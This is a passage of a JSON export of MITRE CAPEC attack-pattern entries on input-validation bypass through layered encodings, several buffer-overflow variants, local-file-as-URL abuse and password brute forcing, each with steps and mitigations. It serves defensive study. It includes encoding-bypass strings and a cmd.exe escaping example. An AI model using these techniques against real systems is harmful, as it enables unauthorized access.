overflow a buffer and execute arbitrary commands on the system with root privileges.","Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-364"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"43":{"ID":"43","Name":"Exploiting Multiple Input Interpretation Layers","Abstraction":"Detailed","Status":"Draft","Description":"An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \\"layer\\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --\x3e <input validator> --\x3e <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application/system inputs where bypassing input validation is desired] The attacker first needs to determine all of the application\'s/system\'s inputs where input validation is being performed and where they want to bypass it.","Technique":"While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions."},{"Step":"2","Phase":"Experiment","Description":"[Determine which character encodings are accepted by the application/system] The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application\'s/system\'s response to the encoded data to determine whether the data was interpreted properly.","Technique":["Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, \'\\\\\'","Determine whether URL encoding is accepted by the application/system.","Determine whether UTF-8 encoding is accepted by the application/system.","Determine whether UTF-16 encoding is accepted by the application/system.","Determine if any other encodings are accepted by the application/system."]},{"Step":"3","Phase":"Experiment","Description":"[Combine multiple encodings accepted by the application.] The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.","Technique":["Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \\"\\\\\\\\\\\\.\\". With two parsing layers, this may get converted to \\"\\\\.\\" after the first parsing layer, and then, to \\".\\" after the second. If the input validation layer is between the two parsing layers, then \\"\\\\\\\\\\\\.\\\\\\\\\\\\.\\" might pass a test for \\"..\\" but still get converted to \\"..\\" afterwards. This may enable directory traversal attacks.","Combine multiple encodings and observe the effects. For example, the attacker might encode \\".\\" as \\"\\\\.\\", and then, encode \\"\\\\.\\" as \\"&#92;&#46;\\", and then, encode that using URL encoding to \\"%26%2392%3B%26%2346%3B\\""]},{"Step":"4","Phase":"Exploit","Description":"[Leverage ability to bypass input validation] Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.","Technique":["Gain access to sensitive files.","Perform command injection.","Perform SQL injection.","Perform XSS attacks."]}]},"Prerequisites":{"Prerequisite":["User input is used to construct a command to be executed on the target system or as part of the file name.","Multiple parser passes are performed on the data supplied by the user."]},"Skills_Required":{"Skill":["Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters.",{"Level":"Medium"}]},"Indicators":{"Indicator":"Control characters are being detected by the filters repeatedly."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.","Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist would not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Using Escapes",{"style":"color:#32498D; font-weight:bold;"},"Original String: C:\\\\\\\\\\\\\\\\winnt\\\\\\\\\\\\\\\\system32\\\\\\\\\\\\\\\\cmd.exe /c",{"style":"margin-left:10px;","class":"informative"}],"p":["The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \\"double escape\\" the backslash. In some cases, a quadruple escape is necessary.","This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.","[REF-1]"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"179"},{"CWE_ID":"181"},{"CWE_ID":"184"},{"CWE_ID":"183"},{"CWE_ID":"77"},{"CWE_ID":"78"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"44":{"ID":"44","Name":"Overflow Binary Resource File","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the attacker access to the execution stack and execute arbitrary code in the target process.","Extended_Description":"This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"ChildOf","CAPEC_ID":"23"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target software] The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software."}]},"Prerequisites":{"Prerequisite":["Target software processes binary resource files.","Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file."]},"Skills_Required":{"Skill":["To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Perform appropriate bounds checking on all buffers.","Design: Enforce principle of least privilege","Design: Static code analysis","Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes","Implementation: Keep software patched to ensure that known vulnerabilities are not available for attackers to target on host."]},"Example_Instances":{"Example":"Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the attacker has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Extended_Description"}]}},"45":{"ID":"45","Name":"Buffer Overflow via Symbolic Links","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program that might load in certain files to memory."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow file content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack."}]},"Prerequisites":{"Prerequisite":["The attacker can create symbolic link on the target host.","The target host does not perform correct boundary checking while consuming data from a resources."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":["An attacker creating or modifying Symbolic links is a potential signal of attack in progress.","An attacker deleting temporary files can also be a sign that the attacker is trying to replace legitimate resources with malicious ones."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.","Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.","Pay attention to the resource pointed to by your symlink links (See attack pattern named \\"Forced Symlink race\\"), they can be replaced by malicious resources.","Always check the size of the input data before copying to a buffer.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":{"div":["Attack Example: Overflow with Symbolic Links in EFTP Server",{"style":"color:#32498D; font-weight:bold;"}],"p":"The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"46":{"ID":"46","Name":"Overflow Variables and Tags","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The attacker crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"PeerOf","CAPEC_ID":"8"},{"Nature":"PeerOf","CAPEC_ID":"10"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] The adversary will upload the crafted file to the application, causing a buffer overflow."}]},"Prerequisites":{"Prerequisite":["The target program consumes user-controllable data in the form of tags or variables.","The target program does not perform sufficient boundary checking."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution.","Do not trust input data from user. Validate all user input."]},"Example_Instances":{"Example":[{"div":["Attack Example: Overflow Variables and Tags in MidiPlug",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag."},{"div":["Attack Example: Overflow Variables and Tags in Exim",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"47":{"ID":"47","Name":"Buffer Overflow via Parameter Expansion","Abstraction":"Detailed","Status":"Draft","Description":"In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":"Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer."},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer."}]},"Prerequisites":{"Prerequisite":["The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.","The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)."]},"Skills_Required":{"Skill":["Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the attacker needs to write the shell code to accomplish their goals, but the attacker also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled attacker.",{"Level":"High"}]},"Resources_Required":{"Resource":"Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":"Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system"},"Example_Instances":{"Example":[{"p":["Attack Example: FTP glob()","The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().","This buffer overflow occurs in memory that is dynamically allocated. It may be possible for attackers to exploit this vulnerability and execute arbitrary code on the affected host.","To exploit this, the attacker must be able to create directories on the target host.","The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote attacker can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the attacker must be able to create directories on the FTP server.","[REF-1]"]},{"p":["Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.","The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"130"},{"CWE_ID":"131"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"48":{"ID":"48","Name":"Passing Local Filenames to Functions That Expect a URL","Abstraction":"Standard","Status":"Draft","Description":"This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser\'s authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify web application URL inputs] Review application inputs to find those that are designed to be URLs.","Technique":["Manually navigate web site pages to identify URLs.","Use automated tools to identify URLs."]},{"Step":"2","Phase":"Experiment","Description":"[Identify URL inputs allowing local access.] Execute test local commands via each URL input to determine which are successful.","Technique":["Manually execute a local command (such as \'pwd\') via the URL inputs.","Using an automated tool, test each URL input for weakness."]},{"Step":"3","Phase":"Exploit","Description":"[Execute malicious commands] Using the identified URL inputs that allow local command execution, execute malicious commands.","Technique":"Execute local commands via the URL input."}]},"Prerequisites":{"Prerequisite":"The victim\'s software must not differentiate between the location and type of reference passed the client software, e.g. browser"},"Skills_Required":{"Skill":["Attacker identifies known local files to exploit",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.","Design: Use browser technologies that do not allow client side scripting.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser"]},"Example_Instances":{"Example":{"p":["J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains","Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access."],"div":["hibernate.connection.driver_class = org.postgresql.Driver",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"241"},{"CWE_ID":"706"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-416"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"}]}},"49":{"ID":"49","Name":"Password Brute Forcing","Abstraction":"Standard","Status":"Draft","Description":"In this attack, the adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password. A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"112"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Exploit","Description":"[Brute force password] Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.","Technique":["Manually or automatically enter all possible passwords through the application/system\'s interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.","Perform an offline dictionary attack or a rainbow table attack against a known password hash."]}]},"Prerequisites":{"Prerequisite":["An adversary needs to know a username to target.","The system uses password based authentication as the one factor authentication mechanism.","An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical."]},"Skills_Required":{"Skill":["A brute force attack is very straightforward. A variety of password cracking tools are widely 